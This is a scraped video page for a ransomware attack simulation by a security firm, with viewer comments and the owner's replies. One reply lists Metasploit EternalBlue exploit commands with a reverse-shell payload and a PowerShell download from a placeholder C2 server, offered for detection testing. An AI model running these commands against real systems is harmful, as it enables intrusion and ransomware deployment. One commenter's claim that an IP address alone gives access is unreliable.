No video

Ransomware Attack Simulation

  Рет қаралды 109,482

Lockard

Lockard

Күн бұрын

Lockard Security conducted a ransomware simulation that started off by exploited a fully patched and updated Windows 10 pro system running Office 2021. The exploit was using a Word document that was able to establish a reverse tcp shell. From there Lockard Security was able to setup persistence by backdooring Google Chrome and deployed ransomware. The ransomware attack was successful and was able to move laterally into different subnets by abusing the trust between zones. For a security assessment by Lockard Security, contact us at www.lockardsec... to schedule your assessment today.

Пікірлер: 107
@user-zm6ld2qq8p
@user-zm6ld2qq8p 2 ай бұрын
Need more videos on the practical red team You are explaining in the best way. I request you to make more videos to learn from you
@lockardsecurity
@lockardsecurity Ай бұрын
Thank you, I will
@MAG320
@MAG320 10 ай бұрын
I would like to see how the ransomware was created (for ed purposes) so I can provide a debrief to a couple clients.
@UniqueMappingSequence
@UniqueMappingSequence 4 ай бұрын
🤨🤨
@mohammadiaa
@mohammadiaa 3 ай бұрын
Yeeees clients
@samajbhanproduction1520
@samajbhanproduction1520 2 ай бұрын
IKIK
@lockardsecurity
@lockardsecurity Ай бұрын
There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@marvinokapo3321
@marvinokapo3321 Жыл бұрын
Hey mate the Infection-Simulation document that you used to maintained the connection and to upload the malware in the victim machine where did you get it from? (Educational purpose). Thanks.
@lockardsecurity
@lockardsecurity Ай бұрын
There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@MrRobot-yb8cb
@MrRobot-yb8cb Ай бұрын
@@lockardsecuritywould be interesting to see the document park breakdown!
@alialazawi2849
@alialazawi2849 Ай бұрын
@@lockardsecurity What about the environment? can we use it please?
@SamuraiJack1881
@SamuraiJack1881 2 жыл бұрын
Thank you for everyting bro, have a good job.
@sadnanjuhib
@sadnanjuhib 12 күн бұрын
I love this video ❤
@conan5890
@conan5890 Жыл бұрын
Nice video, explanation and demonstration. I think you should try again against a computer who has a paid license of antivirus (e.g ESET etc). The free version Windows defender has nothing in order to defend any attack.
@detective5253
@detective5253 Жыл бұрын
this is interesting technique and similar somehow to a signed malware with a company's private signing key typically to backdoor whitelisted applications. modern cyber sec are getting way more sophisticated than ever.
@fraudx13
@fraudx13 11 ай бұрын
I Was Also Looking For That Type Of Videos Bro 🥲
@lockardsecurity
@lockardsecurity Ай бұрын
Thanks for the feedback, I use antiscan.me to test detections on the payloads, I also have the paid version of CrowdStrike I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@sagisar
@sagisar 4 ай бұрын
I would thank you if you could give a link to your research with all the commands you used for the persistence part, of course just for educational purposes
@lockardsecurity
@lockardsecurity Ай бұрын
I currently do not have them published publicly, however that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@alexbrasilia6459
@alexbrasilia6459 10 ай бұрын
Do you have a paid course to be possible we learn step by step about this ?
@lockardsecurity
@lockardsecurity Ай бұрын
Its in the works, I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@InternetVet
@InternetVet 5 ай бұрын
just drop all inbound connections on port 5985 & 5986 to prevent this?
@lockardsecurity
@lockardsecurity Ай бұрын
In this example, there is attack is a Reverse Shell connection. Meaning the victim's system is beaconing on to the Internet (Egress). Not sure if you noticed or not, but the first connection was over TCP port 443 HTTPS. Meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 DNS. Another big issue if you try and block DNS on your network. No BIND connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones), will leverage ports that MUST be open, like 53, 80, 443 to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@GreekShortTravels
@GreekShortTravels 4 ай бұрын
Can you make a tutorial on how to create such ransomware?(Love your content)
@Hogrider6.9
@Hogrider6.9 3 ай бұрын
lol
@lockardsecurity
@lockardsecurity Ай бұрын
I've kicked around a few ideas and yes there will be future videos to come on not just how to make them, but also how to evade detections from all the big name security tools.
@Hogrider6.9
@Hogrider6.9 Ай бұрын
@@lockardsecurity guess we will wait
@alialazawi2849
@alialazawi2849 Ай бұрын
I love the video!!
@lockardsecurity
@lockardsecurity Ай бұрын
Thanks for watching, please like, share and subscribe as we'll be releasing more videos like this in the near future!
@hack-talk9098
@hack-talk9098 2 жыл бұрын
Start with the full video so I learn how to create the payload and listener
@lockardsecurity
@lockardsecurity Жыл бұрын
I'll be creating an updated video with full end to end which will show the latest and greatest processes and methods.
@magnese7993
@magnese7993 5 ай бұрын
Which kali tool did you used?
@zilverfox-wu1yd
@zilverfox-wu1yd Жыл бұрын
i assume you made a backdoor first, just how do you crypt it in kali linux plus exploit?
@lockardsecurity
@lockardsecurity Жыл бұрын
Its a broken Macro technique, I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.
@zilverfox-wu1yd
@zilverfox-wu1yd Жыл бұрын
@@lockardsecurity okay thanks lol
@kasinoFlow
@kasinoFlow Жыл бұрын
@@lockardsecurityI want to learn more about hacking can you make a discord by anychance
@udohpele1696
@udohpele1696 2 жыл бұрын
Thanks for this demo. On question please, if the user is not a local admin and is unable to run the file after clicking, will the hack still be successful?
@lockardsecurity
@lockardsecurity Жыл бұрын
Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the users permissions. When this happens, the attack much do a privilege escalation attack to get admin / root access.
@sen7826
@sen7826 2 ай бұрын
The whole process begins with opening malicious file. Is it possible to identify the file as malicious with the default Windows Defender scan? If not, what else can a layman do to recognise which files are unsafe?
@lockardsecurity
@lockardsecurity Ай бұрын
Great question, and unfortunately as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few thinks: 1. Scan for malware using trusted antivirus/anti-malware tools. 2. Use VirusTotal for file analysis, www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know, that everything uploaded to VirusTotal can be downloaded by anyone that request it. Most folks are security researchers who work for security companies that make Ant-Virus / EDR products and use these uploads to help improve their detection logic. So the take away is, you dont want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they dont submit uploads to 3rd parties like VirusTotal does. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@sen7826
@sen7826 Ай бұрын
@@lockardsecurity thank you for taking the time, this was very informative.
@Dr.Yuzerssif
@Dr.Yuzerssif 8 ай бұрын
Thank you for this video. I need your help.. My laptop was exposed to a JAWR ransomware attack. I see that you are an expert in this field. I hope you can help me solve this complex problem. Thank you very much in advance
@lockardsecurity
@lockardsecurity Ай бұрын
Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.
@styxnet._
@styxnet._ Ай бұрын
bro this is so good
@lockardsecurity
@lockardsecurity Ай бұрын
Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@jaydave4696
@jaydave4696 Жыл бұрын
Hey! It's an absolute amazing video..but how can i get this codes..for my Ransomware project?can u reply pls.
@paradownload2051
@paradownload2051 10 ай бұрын
Sir can i have a copy ofnthat simulation? For educational purposes, im into cybersec right now
@rafaelsandoval6472
@rafaelsandoval6472 2 жыл бұрын
do you have a video where you put the malicious code into the macro file? Thank you
@lockardsecurity
@lockardsecurity Жыл бұрын
Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not, the main reason for that is so AV vendors doesn't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating move videos on the entire process, start to finish. Along with diving deeper into the code and methods used.
@rersheed
@rersheed Жыл бұрын
HI! I have been trying to simulate ransomware traffic for testing a countermeasure but I couldn't. How can I simulate wannacry ransomware traffic? Best Regards
@lockardsecurity
@lockardsecurity Ай бұрын
Each ransomware is slightly different, but also slightly similar. Great question and wish I could have responded sooner. I'll create a video on this topic as well. In the mean time for Wannacry, do the following: Tools and Steps for Simulation: 1. Set Up a Controlled Environment: * Use a virtual lab with several Windows machines. * Ensure the environment is completely isolated from any production networks. 2. Simulate Infection Traffic: * Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry. Load Metasploit with the EternalBlue module: bash Copy code msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST exploit * Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files. * Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting). * Generate network traffic to simulate command and control (C2) communication: powershell, Copy code: $WebClient = New-Object System.Net.WebClient $WebClient.DownloadString("your-c2-server.com/command") 3. Monitor and Analyze Traffic: * Use network monitoring tools like Wireshark to capture and analyze the simulated traffic. * Verify the detection of IOCs with your security tools (SIEM, IDS/IPS). 4. Deploy Detection and Prevention Measures: * Implement rules in your security tools to detect the IOCs listed above. * Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@SteveRoufosse
@SteveRoufosse 8 ай бұрын
Je parie que personne ne saurait m'envoyer un ransomware 😂
@meowtrox1234
@meowtrox1234 10 ай бұрын
how about if you have a DYNAMIC IP ADDRESS? will ransomware be possible?
@sunrevolver
@sunrevolver Ай бұрын
Yes
@lockardsecurity
@lockardsecurity Ай бұрын
Yes, in this case, the ransomware will act more like a worm, scan the entire network and attempt to spread to all hosts that appear to be up.
@ronwurdesagendasises9249
@ronwurdesagendasises9249 Жыл бұрын
How do you make this Word Document without Makros?
@lockardsecurity
@lockardsecurity Жыл бұрын
Its a broken Macro technique. I recommend taking the OSEP training to learn more about this method.
@shadowsalah1484
@shadowsalah1484 5 ай бұрын
Hey guys hacker's control ransom with a C&C server?
@lockardsecurity
@lockardsecurity Ай бұрын
Thats right!
@gernot4490
@gernot4490 Жыл бұрын
does kaspersky allow opening the infected word-doc in the beginning of the vid? i dont think so so its preventing the ransomware attack?
@jacvbtaylor
@jacvbtaylor 5 ай бұрын
That probably all depends on the exploit in the doc
@lockardsecurity
@lockardsecurity Ай бұрын
This doc at the time was whats known as a FUD, meaning fully undetectable. However now just about all vendors flag it today. That said, I'll be recreating this video in the near future and will be showing it against all the major AV /' EDR vendors.
@Gm-Rifat
@Gm-Rifat Жыл бұрын
What kind of mail you are using ? How can I use it ? Is it free ?
@andreazaric303
@andreazaric303 Жыл бұрын
Is tempmail
@lockardsecurity
@lockardsecurity Ай бұрын
in that example it was mailinator
@SSN5-R
@SSN5-R 9 ай бұрын
It's Kali Linux
@lockardsecurity
@lockardsecurity Ай бұрын
Yes, that is right!
@danwolf1168
@danwolf1168 Жыл бұрын
Instead of “hacker” you should say cyber criminal.
@saji002
@saji002 11 ай бұрын
generally its hacker
@lockardsecurity
@lockardsecurity Ай бұрын
True, bad actor is also on the list. But to be honest when I created this video I honestly thought it was going to be geared more toward NON security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@sreerahul6663
@sreerahul6663 Жыл бұрын
Hi bro If a pc is infected with ransomeware virus how to decrypt it please do a video
@HiChicken-zj7yc
@HiChicken-zj7yc 11 ай бұрын
you can't, pay or format your pc
@littleghoost
@littleghoost 10 ай бұрын
how to disable antivirus before infecting?
@lockardsecurity
@lockardsecurity Ай бұрын
Each AV has its own steps to follow, most are been controlled via Registry or the running process memory space.
@littleghoost
@littleghoost Ай бұрын
@@lockardsecurity Ok. Windows Defender for example, can it be disabled through the malware itself?
@a6eu
@a6eu Жыл бұрын
Hello Lord, I have final project tomotrow, and I need to demonstrate this attack to get bonus points, I really need this. Can you help me, plsss?!!
@lockardsecurity
@lockardsecurity Жыл бұрын
Dang, I'm just now seeing this comment! Hope you were able to do demonstrate this for your class.
@thewickedmma
@thewickedmma 7 ай бұрын
broo help me out. im going through the same thingg
@apitaremore9453
@apitaremore9453 Жыл бұрын
how to remove ransomware??
@harshadsd90
@harshadsd90 Жыл бұрын
same question tried all decryption methods but not work 😢😢
@HiChicken-zj7yc
@HiChicken-zj7yc 11 ай бұрын
cause u can't only the one who puts it in the system who can which u gonna need to pay for
@BlueZackMuthey
@BlueZackMuthey 11 ай бұрын
how did you get access to the targets computer?
@BlockImmigrants
@BlockImmigrants 10 ай бұрын
The link the victim clicked gave away the IP address, and with the IP, the hacker can basically access the victim.
@TK-od8hd
@TK-od8hd 9 ай бұрын
​@@BlockImmigrantsso a Firewall rule will block this connection?
@issho8885
@issho8885 9 ай бұрын
​@@TK-od8hdonly if the attacker IP was known beforehand and it was put in the rule
@lockardsecurity
@lockardsecurity Ай бұрын
It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise) which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.
@networksolucoes7537
@networksolucoes7537 5 ай бұрын
Muito boa apresentação!!
@fwiii1831
@fwiii1831 2 жыл бұрын
How did you make it without WinDef or AV noticing or alarming? Can u tell me in 1-2 sentences how this exploit works and what I need to do? (educational purposes only)
@zilverfox-wu1yd
@zilverfox-wu1yd Жыл бұрын
crypter
@lockardsecurity
@lockardsecurity Жыл бұрын
Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in away that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious,. It requires a lot of testing, trail and error. For example, the methods I used here no longer works, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.
@electragammingtech9801
@electragammingtech9801 2 жыл бұрын
give me the google sheet documents
@lockardsecurity
@lockardsecurity Жыл бұрын
You don't want it :D
@robertclark2607
@robertclark2607 Жыл бұрын
who would use windows ge
@itsmattg_shorts
@itsmattg_shorts Жыл бұрын
So you don’t go to jail y’all, hack a vm lol
@lockardsecurity
@lockardsecurity Ай бұрын
To be clear its my VM, and you can hack your own stuff, providing you give yourself permission to do so lol!
@mohamedamjath3884
@mohamedamjath3884 Жыл бұрын
Hi, can i contact you pls
@lockardsecurity
@lockardsecurity Ай бұрын
Yes, you can reach out to www.lockardsecurity.com Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
How Does Ransomware Work? - A Step-by-Step Breakdown
13:07
Grant Collins
Рет қаралды 19 М.
Ransomware Is An Epidemic And It's Getting Worse | Cryptoland
24:19
SPONGEBOB POWER-UPS IN BRAWL STARS!!!
08:35
Brawl Stars
Рет қаралды 20 МЛН
А ВЫ УМЕЕТЕ ПЛАВАТЬ?? #shorts
00:21
Паша Осадчий
Рет қаралды 1,5 МЛН
managed to catch #tiktok
00:16
Анастасия Тарасова
Рет қаралды 46 МЛН
Windows Defender vs Top 100 Malware Sites
10:15
The PC Security Channel
Рет қаралды 696 М.
Hacking challenge at DEFCON
6:16
Conflict International
Рет қаралды 1 МЛН
Strange File in Downloads Folder? Gootloader Malware Analysis
30:20
John Hammond
Рет қаралды 744 М.
How Hackers Write Malware & Evade Antivirus (Nim)
24:04
John Hammond
Рет қаралды 397 М.
How A Printer Lost A Country $81,000,000
15:58
Cipher
Рет қаралды 516 М.
Dealing with a Ransomware Attack: A full guide
10:01
The PC Security Channel
Рет қаралды 485 М.
What is Ransomware?
12:48
IBM Technology
Рет қаралды 46 М.
Hack With SMS | SMS Spoofing like Mr. Robot!
11:32
zSecurity
Рет қаралды 1 МЛН
SPONGEBOB POWER-UPS IN BRAWL STARS!!!
08:35
Brawl Stars
Рет қаралды 20 МЛН